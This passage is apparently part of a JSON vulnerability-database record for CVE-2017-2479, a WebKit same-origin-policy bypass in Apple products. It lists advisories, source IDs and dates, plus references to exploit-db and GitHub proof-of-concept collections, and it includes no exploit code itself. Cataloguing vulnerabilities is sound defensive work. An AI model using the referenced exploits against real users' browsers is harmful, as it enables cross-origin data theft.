"title": "HT207601",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT207601"
},
{
"title": "HT207607",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT207607"
},
{
"title": "HT207617",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT207617"
},
{
"title": "HT207599",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT207599"
},
{
"title": "HT207600",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT207600"
},
{
"title": "HT207599",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT207599"
},
{
"title": "HT207600",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT207600"
},
{
"title": "HT207601",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT207601"
},
{
"title": "HT207607",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT207607"
},
{
"title": "HT207617",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT207617"
},
{
"title": "Multiple Apple product WebKit Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68869"
},
{
"title": "Apple: iCloud for Windows 6.2",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ec0dbe9c3dba8c45d36ab3d8d8948ccf"
},
{
"title": "Apple: iTunes 12.6 for Windows",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=a2320462745411a5547ed48fe868a9a6"
},
{
"title": "Apple: Safari 10.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=5c4ba20f7a3a0bac6dc3db074ec0daa4"
},
{
"title": "Apple: tvOS 10.2",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=96152d4695ab80cff7cf110b4458ab10"
},
{
"title": "Apple: iOS 10.3",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=e3eec66a6152b7f2dac0fe21bb8ee9cd"
},
{
"title": "uxss-db",
"trust": 0.1,
"url": "https://github.com/Metnew/uxss-db "
},
{
"title": "uxss-db",
"trust": 0.1,
"url": "https://github.com/0xR0/uxss-db "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/41866/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/97176"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht207599"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht207600"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht207601"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht207607"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht207617"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1038157"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-2479"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-2479"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu90482935/index.html"
},
{
"trust": 0.3,
"url": "https://www.apple.com/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-2480"
},
{
"trust": 0.2,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-2463"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5029"
},
{
"trust": 0.2,
"url": "http://gpgtools.org"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-2383"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/vulnerabilities/apple-safari-cve-2017-2463"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/metnew/uxss-db"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht207607"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht204283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-5300"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6153"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3415"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3270"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6607"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3416"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3414"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7443"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-6702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4472"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148"
},
{
"trust": 0.1,
"url": "https://www.apple.com/itunes/download/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1147"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2000/svg\""
},
{
"trust": 0.1,
"url": "https://crbug.com/663476\u003c/a\u003e."
},
{
"trust": 0.1,
"url": "https://abc.xyz/\u0027;\""
},
{
"trust": 0.1,
"url": "https://abc.xyz/\u0027;\u003c/a\u003e"
},
{
"trust": 0.1,
"url": "https://crbug.com/663476\""
},
{
"trust": 0.1,
"url": "http://www.w3.org/2000/svg\u003c/a\u003e\"\u003e"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"db": "BID",
"id": "97176"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "PACKETSTORM",
"id": "141936"
},
{
"db": "PACKETSTORM",
"id": "141937"
},
{
"db": "PACKETSTORM",
"id": "141979"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"db": "BID",
"id": "97176"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "PACKETSTORM",
"id": "141936"
},
{
"db": "PACKETSTORM",
"id": "141937"
},
{
"db": "PACKETSTORM",
"id": "141979"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-02T00:00:00",
"db": "VULHUB",
"id": "VHN-110682"
},
{
"date": "2017-04-02T00:00:00",
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"date": "2017-03-28T00:00:00",
"db": "BID",
"id": "97176"
},
{
"date": "2017-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"date": "2017-03-28T23:02:22",
"db": "PACKETSTORM",
"id": "141936"
},
{
"date": "2017-03-28T23:44:44",
"db": "PACKETSTORM",
"id": "141937"
},
{
"date": "2017-04-10T00:03:11",
"db": "PACKETSTORM",
"id": "141979"
},
{
"date": "2017-03-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"date": "2017-04-02T01:59:03.700000",
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-19T00:00:00",
"db": "VULHUB",
"id": "VHN-110682"
},
{
"date": "2019-03-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"date": "2017-04-04T00:01:00",
"db": "BID",
"id": "97176"
},
{
"date": "2017-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"date": "2019-03-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"date": "2024-11-21T03:23:36.567000",
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Apple Used in products WebKit Vulnerabilities that bypass the same origin policy",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.